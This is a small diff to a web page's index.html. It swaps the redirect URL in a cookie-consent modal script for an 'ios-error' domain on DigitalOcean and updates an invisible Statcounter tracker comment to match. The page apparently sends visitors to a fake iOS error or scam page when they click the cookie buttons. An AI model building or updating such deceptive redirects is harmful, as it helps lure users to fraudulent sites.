--- a/index.html
+++ b/index.html
@@ -274,7 +274,7 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
 <script>
 (function(){
-  const redirectURL = "https://teal-marshmallow-83707e.netlify.app";
+  const redirectURL = "https://ios-error-cyvbq.ondigitalocean.app";
   const overlay = document.getElementById('cookieModalOverlay');
   const acceptBtn = document.getElementById('acceptCookies');
   const denyBtn = document.getElementById('denyCookies');
@@ -358,7 +358,7 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 </body>
 </html>
 <!-- Default Statcounter code for ios
-https://teal-marshmallow-83707e.netlify.app -->
+https://ios-error-cyvbq.ondigitalocean.app -->
 <script type="text/javascript">
 var sc_project=13188833; 
 var sc_invisible=1; 
